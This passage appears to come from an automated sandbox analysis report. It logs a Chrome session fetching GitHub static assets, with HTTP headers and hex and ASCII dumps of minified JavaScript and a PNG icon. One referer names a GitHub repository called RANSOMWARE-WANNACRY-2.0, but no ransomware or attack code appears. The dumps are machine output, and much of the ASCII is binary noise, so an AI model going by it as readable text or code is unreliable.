                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6c 2e 70 75 73 68 28 6e 29 3b 74 68 69 73 2e 73 69 7a 65 2b 2b 2c 68 2e 70 75 73 68 28 65 29 7d 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 7b 76 61 72 20 6e 2c 6f 2c 72 2c 69 2c 73 2c 61 2c 6c 2c 63 2c 64 3d 74 68 69 73 2e 61 63 74 69 76 65 49 6e 64 65 78 65 73 2c 66 3d 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 73 3d 5b 5d 2c 68 3d 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 4f 62 6a 65 63 74 73 2c 70 3d 7b 7d 2c 6d 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 72 3d 30 2c 6e 3d 75 28 74 68 69 73 2e 69 6e 64 65 78 65 73 2c 65 29 3b 72 3c 6e 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 66 6f 72 28 6f 3d 6e 5b 72 5d 2c
                                                                                      Data Ascii: l.push(n);this.size++,h.push(e)}},o.prototype.remove=function(e,t){if("string"==typeof e){var n,o,r,i,s,a,l,c,d=this.activeIndexes,f=this.selectors=[],h=this.selectorObjects,p={},m=1==arguments.length;for(r=0,n=u(this.indexes,e);r<n.length;r++)for(o=n[r],
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2c 61 72 67 75 6d 65 6e 74 73 29 2c 6f 2e 61 70 70 6c 79 28 65 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 6d 2e 73 65 74 28 74 68 69 73 2c 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 29 7b 6d 2e 73 65 74 28 74 68 69 73 2c 21 30 29 2c 67 2e 73 65 74 28 74 68 69 73 2c 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 29 7b 72 65 74 75 72 6e 20 62 2e 67 65 74 28 74 68 69 73 29 7c 7c 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 41 28 65 2c 74 29 7b 79 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 63 75 72 72 65 6e 74 54 61 72 67 65 74 22 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 74 7c 7c 79 2e 67 65 74 7d 29 7d 66 75 6e 63 74
                                                                                      Data Ascii: ,arguments),o.apply(e,arguments)},e}function v(){m.set(this,!0)}function _(){m.set(this,!0),g.set(this,!0)}function x(){return b.get(this)||null}function A(e,t){y&&Object.defineProperty(e,"currentTarget",{configurable:!0,enumerable:!0,get:t||y.get})}funct
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 28 29 3d 3e 5f 7d 29 3b 6c 65 74 20 72 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 69 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 3d 64 6f 63 75 6d 65 6e 74 29 7b 69 66 28 69 2e 68 61 73 28 65 29 29 72 65 74 75 72 6e 20 69 2e 67 65 74 28 65 29 3b 6c 65 74 20 74 3d 21 31 2c 6e 3d 6e 65 77 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 65 3d 3e 7b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 65 29 69 66 28 22 61 74 74 72 69 62 75 74 65 73 22 3d 3d 3d 74 2e 74 79 70 65 26 26 74 2e 74 61 72 67 65 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 29 64 28 74 2e 74 61 72 67 65 74 29 3b 65 6c 73 65 20 69 66 28 22 63 68 69 6c 64 4c 69 73 74 22 3d 3d 3d 74 2e 74 79 70 65 26 26 74 2e 61 64 64 65 64 4e 6f 64 65 73 2e 6c 65 6e 67
                                                                                      Data Ascii: ()=>_});let r=new WeakSet,i=new WeakMap;function s(e=document){if(i.has(e))return i.get(e);let t=!1,n=new MutationObserver(e=>{for(let t of e)if("attributes"===t.type&&t.target instanceof Element)d(t.target);else if("childList"===t.type&&t.addedNodes.leng
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 20 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 60 5b 64 61 74 61 2d 74 61 72 67 65 74 7e 3d 22 24 7b 6e 7d 2e 24 7b 74 7d 22 5d 60 29 29 69 66 28 6f 2e 63 6c 6f 73 65 73 74 28 6e 29 3d 3d 3d 65 29 72 65 74 75 72 6e 20 6f 7d 6c 65 74 20 66 3d 65 3d 3e 53 74 72 69 6e 67 28 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 2e 64 65 73 63 72 69 70 74 69 6f 6e 3a 65 29 2e 72 65 70 6c 61 63 65 28 2f 28 5b 41 2d 5a 5d 28 24 7c 5b 61 2d 7a 5d 29 29 2f 67 2c 22 2d 24 31 22 29 2e 72 65 70 6c 61 63 65 28 2f 2d 2d 2f 67 2c 22 2d 22 29 2e 72 65 70 6c 61 63 65 28 2f 5e 2d 7c 2d 24 2f 2c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 68 3d 28 65 2c 74 3d 22 70 72 6f 70 65 72 74 79 22 29 3d 3e 7b 6c 65 74 20 6e 3d 66 28 65 29 3b 69 66 28 21
                                                                                      Data Ascii: e.querySelectorAll(`[data-target~="${n}.${t}"]`))if(o.closest(n)===e)return o}let f=e=>String("symbol"==typeof e?e.description:e).replace(/([A-Z]($|[a-z]))/g,"-$1").replace(/--/g,"-").replace(/^-|-$/,"").toLowerCase(),h=(e,t="property")=>{let n=f(e);if(!
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 6f 29 7b 74 2e 61 74 74 72 69 62 75 74 65 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 28 74 68 69 73 2c 65 2c 6e 2c 6f 2c 72 29 7d 3b 6c 65 74 20 69 3d 65 2e 6f 62 73 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 7c 7c 5b 5d 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 6f 62 73 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 22 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 28 29 7b 72 65 74 75 72 6e 20 74 2e 6f 62 73 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 28 74 68 69 73 2c 69 29 7d 2c 73 65 74 28 65 29 7b 69 3d 65 7d 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 65 2e 6f 62 73 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 7c 7c
                                                                                      Data Ascii: llback=function(e,n,o){t.attributeChangedCallback(this,e,n,o,r)};let i=e.observedAttributes||[];Object.defineProperty(e,"observedAttributes",{configurable:!0,get(){return t.observedAttributes(this,i)},set(e){i=e}}),function(e){let t=e.observedAttributes||
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6e 2e 68 61 73 28 74 29 7c 7c 6e 2e 73 65 74 28 74 2c 6e 65 77 20 53 65 74 29 2c 6e 2e 67 65 74 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 77 28 65 2c 22 74 61 72 67 65 74 22 29 2e 61 64 64 28 74 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 28 29 7b 72 65 74 75 72 6e 20 75 28 74 68 69 73 2c 74 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 2c 74 29 7b 77 28 65 2c 22 74 61 72 67 65 74 73 22 29 2e 61 64 64 28 74 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 6e
                                                                                      Data Ascii: n.has(t)||n.set(t,new Set),n.get(t)}function v(e,t){w(e,"target").add(t),Object.defineProperty(e,t,{configurable:!0,get(){return u(this,t)}})}function _(e,t){w(e,"targets").add(t),Object.defineProperty(e,t,{configurable:!0,get(){return function(e,t){let n


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      123192.168.2.1649836185.199.110.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC395OUTGET /assets/apple-touch-icon-144x144-b882e354c005.png HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC623INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 14426
                                                                                      Cache-Control: public, max-age=31536000
                                                                                      Last-Modified: Mon, 16 Oct 2023 22:41:27 GMT
                                                                                      ETag: "603acd083c6e628cda0184b6b0fcef21"
                                                                                      Content-Type: image/png
                                                                                      Server: AmazonS3
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Age: 6841983
                                                                                      X-Served-By: cache-iad-kiad7000023-IAD, cache-ewr18150-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 42, 925
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 6990c1d718b4371d274f5018dec51d3ed98a1884
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 90 00 00 00 90 08 06 00 00 00 e7 46 e2 b8 00 00 20 00 49 44 41 54 78 da ed 7d 77 9c 95 d5 d5 ee b3 de 29 0c 7d 06 94 12 aa 0e 20 a2 62 8c a2 51 2c b1 21 a2 b1 11 6b 30 7e 89 46 63 8c 35 c6 12 63 44 8d 0d 5b 8c 25 c4 6b 8d 3d 16 14 0b 26 11 4b ac 88 a8 14 83 0a 2a 88 30 f4 61 1a 30 cc cc 59 f7 8f 39 e7 cc 7e d7 5e 6b bf ef 19 30 df fd ee bd ef ef 37 30 73 ce 3e fb ec b2 f6 da 6b 3d ab 51 e5 a0 c1 0c 06 40 68 7d 9c df 39 fb 3b 89 d7 dd 76 cc 00 29 9f 8d 3d e2 75 b5 19 67 5f 27 bb 0d 73 eb ff 44 c6 f7 cb 0f a6 1c 8f f9 64 bf 2f a9 bf d8 b8 02 7d 71 42 9b d8 7a 5b 53 4a d1 06 0c 30 85 a7 b8 a5 c6 1c e5 17 48 2e 56 f6 83 f9 3f 49 5f d4 58 df 14 1f 5c ec 75 f6 9a c5 5e 03 39 84 61 ec 2f 51 9c 78 d4 76 a4
                                                                                      Data Ascii: PNGIHDRF IDATx}w)} bQ,!k0~Fc5cD[%k=&K*0a0Y9~^k070s>k=Q@h}9;v)=ug_'sDd/}qBz[SJ0H.V?I_X\u^9a/Qxv
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 28 61 0f d8 38 70 a4 68 9c 89 82 90 e0 40 05 4b 59 88 cb 40 84 c2 a4 35 0e 21 b4 ca bd 1e ea 9b 99 51 d1 a3 07 46 8f 1e 8d 23 8e 3a 12 7b 7c ff fb e8 d2 a5 0b fe 4f 7c 56 ad 5a 85 d7 a6 bf 8a 17 9e 9f 8a 0f 67 7d 88 0d 1b 36 b4 5e 73 29 14 8f 82 09 38 c5 39 86 05 59 84 da c8 db 41 e3 40 ed 19 74 92 17 85 e1 0d d2 ee 05 02 80 1d 76 dc 01 e3 8f 3d 16 63 0e 39 04 bd 7b f7 06 11 15 c4 21 90 95 53 d2 b4 2d a4 ef a4 ef 6b 69 69 c1 97 5f 7e 89 a9 cf 3e 8b a9 cf 4d c5 37 4b 96 e4 fb 4f e4 bc ed 38 e7 94 82 68 d2 10 90 db 2e af f8 6c 3b 70 30 c3 e2 78 64 dc c9 d2 aa ae 09 c1 42 c3 61 61 0d a7 50 1b 21 40 52 0c 8f 20 fc 60 ff 1f e0 a7 a7 9e 8a 5d 77 db 2d 26 cf 90 10 7a dd d7 25 c1 68 04 e4 7e 4e fb 4c 5a c2 73 09 2e 44 7c cc 8c 86 fa 7a 4c 7f e5 15 dc 7b cf bd f8
                                                                                      Data Ascii: (a8ph@KY@5!QF#:{|O|VZg}6^s)89YA@tv=c9{!S-kii_~>M7KO8h.l;p0xdBaaP!@R `]w-&z%h~NLZs.D|zL{
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 03 e2 7d db 6d be 0d 64 9b 88 b0 e7 5e 7b a2 a6 66 1d e6 ce 99 63 8a 25 9e b5 5e 49 8a a1 b9 94 68 d3 29 86 2b 5c 29 04 41 a1 90 63 ed a2 14 ec af a8 a8 08 97 5e 76 19 8e 19 3f 7e 8b 71 91 ff 9b 88 68 4b 3f c5 c5 c5 b8 f4 b2 cb 50 5f df 80 67 9e 7a 0a a4 5e 1d 50 4d 19 a4 ec b1 74 e7 20 01 2c 46 69 f5 7d 13 81 d6 84 2f e7 f7 9f 9f 71 3a 4e 9a f0 e3 2d ba 58 ff 1d 36 a9 ff 49 e3 2e 2d 2d c5 c4 ab ae c4 3e fb ee 0b b6 62 bd 09 e1 d8 77 8b eb 90 c4 81 da bd 1a 42 fd 13 3f cc 8c 71 87 1f 86 73 cf 3b 0f 51 14 a5 c2 37 d2 b6 f9 ef de b4 f6 f4 b9 25 bd 1a d3 3c 9d 3a 75 c2 cd b7 de 8a a1 c3 86 85 81 df f6 82 8c e4 00 89 32 7c 58 4d 86 c0 4a 70 9e 9b a2 24 a6 1a 32 b6 df 7e 7b 5c 73 dd 75 28 c9 9a 26 24 48 68 01 6e 21 c1 d2 52 bb 43 e0 5d d2 f7 25 f5 63 61 52 85
                                                                                      Data Ascii: }md^{fc%^Ih)+\)Ac^v?~qhK?P_gz^PMt ,Fi}/q:N-X6I.-->bwB?qs;Q7%<:u2|XMJp$2~{\su(&$Hhn!RC]%caR
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 36 25 ac 79 bb ed 86 e1 99 a9 cf a1 ac ac cc 9c 40 92 a6 e4 5e 21 2d 2d 2d 98 70 e2 49 f8 60 e6 4c 8f fa 35 c1 8f cc ac ac 8c f2 f2 72 0c 1d 36 0c 5f 7e f1 05 d6 ad 5b e7 f8 10 53 5c 60 24 df c6 93 4f 6d c7 ba 6d 48 4b 56 9e fb b7 a4 a4 18 5b f7 ea 8d 7e fd fa 61 ce ec d9 ad 57 15 c8 cb d5 ac a5 c8 63 75 ed 19 67 9c 79 26 2e ba e4 e2 20 a1 a4 0d a9 06 80 af be fa 0a 47 8c 3b 0c eb 37 6c f0 6f 96 40 72 74 19 9e 1e b9 c9 ae 41 b6 00 4d e4 2f 18 11 70 d6 39 67 a3 ac ac cc d3 64 dc 9f 24 5c c4 05 e0 9a 9a 9a b0 76 cd 9a b6 ef 14 0e 6b 96 4c 94 03 bc da da 10 6a d6 d5 e0 83 99 33 b1 76 ed da 56 38 00 94 4f 1e 45 ee 7c 0d 6d 83 14 ac 84 9c eb 85 bc 75 23 10 08 cd 4d 2d a8 5a b6 0c 1f cc 9c d9 ca e1 b2 0d 62 1e 82 a4 db 13 49 5c 67 b9 65 5a 5e 55 55 90 c0 af 69
                                                                                      Data Ascii: 6%y@^!---pI`L5r6_~[S\`$OmmHKV[~aWcugy&. G;7lo@rtAM/p9gd$\vkLj3vV8OE|mu#M-ZbI\geZ^UUi
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: fc b2 df a1 b1 b1 51 5d 43 4d 94 08 65 f6 d0 f6 aa a2 a2 02 23 47 8e 8c 73 4a 43 13 65 38 42 b4 56 16 29 56 3e 88 5b bd e2 f6 df 7f 7f 8f ca 93 88 23 6d 64 26 33 e3 ba 6b ae c5 ea d5 ab 63 19 45 59 a9 a8 e7 5a ce 89 95 cd e0 38 31 48 c0 d1 ed d3 13 bc 8d 0a 7d 60 01 b0 ba 80 2b 1b e5 91 44 ea 14 55 c9 92 05 75 0d 33 1a 40 98 f9 fe fb 78 fc d1 47 db 75 68 b5 83 af 7d 66 df fd f6 cd 9a 94 f4 31 bb 20 6d de 1a 2f 4f 26 2b 86 ca 8a 1e 15 d8 6e f8 76 aa 27 5c 08 cc d2 58 aa f6 fb 8c 77 df c3 cb d3 a6 b5 d5 8e 70 84 36 52 80 41 86 0d d4 69 9f 21 21 08 9a 39 70 c4 7a c4 84 65 03 1c 34 41 c4 04 d0 52 6b c3 64 7b 06 82 08 b7 df f6 27 ac 59 b3 a6 60 30 31 2d 08 b9 d7 e8 d1 d9 40 06 7d 7c 32 d4 27 0a c1 13 ee 33 6c d8 76 e8 62 f8 1c 6f ae 27 62 4b 4b 0b 6e ff d3 9f
                                                                                      Data Ascii: Q]CMe#GsJCe8BV)V>[#md&3kcEYZ81H}`+DUu3@xGuh}f1 m/O&+nv'\Xwp6RAi!!9pze4ARkd{'Y`01-@}|2'3lvbo'bKKn
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: c8 01 3b 93 4c 84 45 f2 1a 14 6d 38 45 1b cb 16 15 eb 47 86 1f 8b 7c 02 64 94 9e f4 72 2a 71 d8 b6 47 46 88 b4 db 2c 2a 8a d4 62 c4 9a 73 9f 55 78 c6 f2 70 2c 2a 2a f6 2c f2 5a 59 f6 62 17 ed 55 8b 70 30 bc 48 d1 cd 2d ad 9d fb bb 43 87 0e 28 2d 2d 45 53 73 b3 2e cf 90 a8 d9 6a a5 de 53 ee 2a ef 63 0c 2f ca 83 b5 48 5c 0e a8 59 2e d7 91 38 95 8c 79 cf e1 49 6e 2a 64 ad de ac 9b 09 c4 d0 7a 5c 19 29 97 31 84 19 e8 d4 b1 93 29 2e 58 84 91 d6 56 56 52 5a d2 a6 ba 93 b0 13 3a 44 14 c9 8d 23 57 26 c8 9e c8 5c 5c 76 da ab 29 0d 42 cd cc 28 eb d8 11 a5 1d 3a 98 da 90 29 d7 8b 15 26 59 1b 94 e3 c8 ba 1a 33 a6 44 6a 68 da 1e 91 ae cd 51 40 80 8f 81 80 70 bc 3b c5 78 f3 36 3b 8a 8f 99 64 9c 3d fb 91 21 04 a0 5b f7 ee a9 81 c4 42 34 64 64 f7 5c cd 14 22 94 8f 28 a6
                                                                                      Data Ascii: ;LEm8EG|dr*qGF,*bsUxp,**,ZYbUp0H-C(--ESs.jS*c/H\Y.8yIn*dz\)1).XVVRZ:D#W&\\v)B(:)&Y3DjhQ@p;x6;d=![B4dd\"(
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 9f 93 f6 25 4a f7 19 4d 56 49 fb 19 32 84 e7 34 11 db b9 d7 cf 3b ff fc bc 0b c7 e6 82 b8 da 7e 34 36 36 e2 df 0e b3 48 9a 77 a4 9e 1e 65 5c 9f cc 9b 87 c6 c6 c6 54 c9 a5 d2 48 fa 9a e0 77 ea cf 4f 43 df be 7d 7d 2e 63 80 37 9c 02 5a 66 c0 2e 51 8e 38 60 6a da 31 8c 5c 8a 41 9b 47 1a 08 bd 80 cf 30 33 f6 3f e0 00 8c de 67 ef 82 b8 4c a1 cf d2 6f be c1 ca 15 2b 52 b7 8f d4 4d 21 78 d9 23 aa 96 55 61 f1 a2 45 a6 f6 55 68 0d 52 cd 6a 5c 51 51 81 8b 2e b9 24 eb 65 67 a8 e0 f0 ad aa 6c 21 c5 1a b6 e5 c8 21 2c 6b 41 70 fc 9e 61 88 04 51 a4 23 dc da 01 64 0b b9 96 02 7b 00 19 77 fb 2e 2f 2f c7 45 97 5c dc 5a 7d 39 85 8f 4f c8 f7 c7 b2 20 00 c0 7b ef cd d0 c7 63 64 61 8b 34 4c 2e 07 2e ca 52 e0 ef bc fd 76 62 79 6c a9 e6 4b ce a4 55 4e 76 85 b8 43 0f 1b 87 23 8f
                                                                                      Data Ascii: %JMVI24;~466Hwe\THwOC}}.c7Zf.Q8`j1\AG03?gLo+RM!x#UaEUhRj\QQ.$egl!!,kApaQ#d{w.//E\Z}9O {cda4L..RvbylKUNvC#
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2c 2d 29 c1 d3 cf 4e c1 f6 23 46 24 26 71 cc 64 32 b8 fe da 6b f1 c0 7d f7 23 93 69 13 55 6f ba e5 16 f4 e8 d9 13 67 9e 7e 3a 4e 38 e9 24 fc e6 e2 8b d0 b1 63 c7 82 4a 45 c9 c5 5a bf 7e 3d be 58 b8 10 1f 7d f4 11 e6 ce 9e 83 05 0b 16 a0 aa aa 0a 75 b5 b5 68 6e 6e ce de f3 14 86 ad 29 41 9b d0 08 2c fb 5f 51 51 11 3a 74 e8 80 ad 7b f5 c2 80 01 03 b0 fd 88 11 f8 ee 2e df c5 88 11 3b e0 3b fd be 13 93 6d 2c 64 3e 89 08 42 6d ac b0 72 6b fd 1e 7b e4 51 5c 7e d9 65 79 ca f1 7c a0 94 84 12 b1 e5 a8 1c 38 98 03 21 db 31 d8 3a 8e 0d 31 8e 38 f2 48 dc fc c7 5b 3d 36 aa d9 bc 5a 5a 9a f1 d0 83 0f e1 b6 5b 6f 45 7d 7d 6b 0d f4 9e 3d 7b a2 ff 80 01 98 33 7b 36 a2 28 c2 01 07 1e 88 9b 6f bd 05 9d b2 85 cf d2 58 93 93 04 c9 4c 26 83 9a 9a 1a 54 af ad c6 c2 85 0b f0 87
                                                                                      Data Ascii: ,-)N#F$&qd2k}#iUog~:N8$cJEZ~=X}uhnn)A,_QQ:t{.;;m,d>Bmrk{Q\~ey|8!1:18H[=6ZZ[oE}}k={3{6(oXL&T
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 61 e3 c6 8d 9e f5 38 93 c9 a0 a1 a1 01 9f ce 9f 8f 3b 6f bf 03 87 1d 32 16 f7 dd 7b 2f 08 14 f7 6f 41 38 f3 98 95 12 cf 33 5b 18 9a 5a ae 9f 25 4b 96 14 84 d5 14 92 16 27 b4 b6 5a db 97 5e 7c 09 53 a6 4c 69 5d 0b b6 c7 4c 46 82 2c 17 27 72 3d 28 8b 19 7a 75 63 28 36 23 2d 47 b2 7c 6a 6b 6a 71 f1 85 bf c1 c3 8f 3d 8a ae d9 40 c1 34 49 00 b6 ad ac c4 5e a3 47 e3 5f af bf 91 df c4 87 1e 7c 10 af 4d 9f 9e bf 0a ba 76 ed 8a e5 cb 97 e3 e7 3f 3b 15 c5 c5 c5 18 bc cd 36 e8 b9 55 4f 14 17 17 63 c3 86 0d 58 5e b5 1c 4b be fe 1a 6b d6 ac c1 e0 6d b6 c1 9a 35 6b b2 f9 a8 29 7e 97 5b 56 0c 0e da 5c e3 b9 1a 59 07 20 dd 20 45 37 1c 3c ad 63 7b c8 0c 91 44 8c 56 bf 0b 17 2c c0 c4 2b 7e 0f 6e c9 78 59 da 18 7e 31 3b 04 d4 76 af d4 01 c9 e4 dd 8a fe a6 85 b4 c2 f4 52 23
                                                                                      Data Ascii: a8;o2{/oA83[Z%K'Z^|SLi]LF,'r=(zuc(6#-G|jkjq=@4I^G_|Mv?;6UOcX^Kkm5k)~[V\Y E7<c{DV,+~nxY~1;vR#
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 04 72 06 5a f5 d3 2d c0 49 03 a3 3c f0 31 6b 78 3d fd d4 d3 f0 ec 33 53 62 8b 5b 68 e8 73 9a f7 a2 28 f2 00 c0 58 85 43 08 90 50 03 06 a1 7b 66 4a b0 cd cb 77 88 30 78 5a c8 bc b4 b6 8d 8d 8d b8 fe da eb f0 87 ab 5a 8d d8 70 ea cd b2 b6 0f 0e 10 98 f3 3c 95 55 13 65 e8 35 2b 6b e1 b6 8b 34 c0 88 12 e0 7c c0 8e 0a e5 80 2a e8 7e cf fa 0d 1b 70 c9 45 17 e1 a6 49 37 9a 8e 63 85 14 6d 09 b2 7f e5 2e 77 4f 20 07 8c a4 2e 5c 91 a2 a0 34 2c 79 72 73 1f 09 07 ac 5e b5 0a 67 ff f2 2c dc 77 cf 3d 3e 87 0a f8 89 85 ea c7 a6 9d 97 db 4f a2 47 22 a5 e9 2d d4 1e 71 23 a6 db ae a5 a5 05 77 4f 9e 8c 33 cf 38 03 2b 14 8f c1 2d f1 44 11 05 73 10 52 e0 30 68 e1 ca e6 9c 35 a3 73 4a 35 3e 8d 81 d4 7d 7d de dc b9 38 f1 f8 e3 f1 da f4 57 83 f2 3d 25 c9 ff 94 bc f7 94 40 1f 91
                                                                                      Data Ascii: rZ-I<1kx=3Sb[hs(XCP{fJw0xZZp<Ue5+k4|*~pEI7cm.wO .\4,yrs^g,w=>OG"-q#wO38+-DsR0h5sJ5>}}8W=%@


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      124192.168.2.1649833185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC616OUTGET /assets/app_assets_modules_github_ref-selector_ts-b593b93f23f5.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 10078
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:07 GMT
                                                                                      ETag: 0x8DC33C6BE7864C2
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Age: 2069405
                                                                                      X-Served-By: cache-iad-kjyo7100074-IAD, cache-ewr18163-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 6, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: dbe8f9ec516a5169e77bbd23e323ffd0fc642a12
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 66 2d 73 65 6c 65 63 74 6f 72 5f 74 73 22 5d 2c 7b 38 32 37 33 35 3a 28 65 2c 74 2c 69 29 3d 3e 7b 76 61 72 20 73 3d 69 28 34 36 30 33 37 29 2c 72 3d 69 28 36 39 35 36 37 29 2c 6e 3d 69 28 37 36 30 30 36 29 2c 68 3d 69 28 36 35 37 30 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 2c 69 2c 73 29 7b 76 61 72 20 72 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 68 3d 6e 3c 33 3f 74 3a 6e 75 6c 6c 3d 3d 3d 73 3f 73 3d 4f 62 6a 65 63 74 2e 67
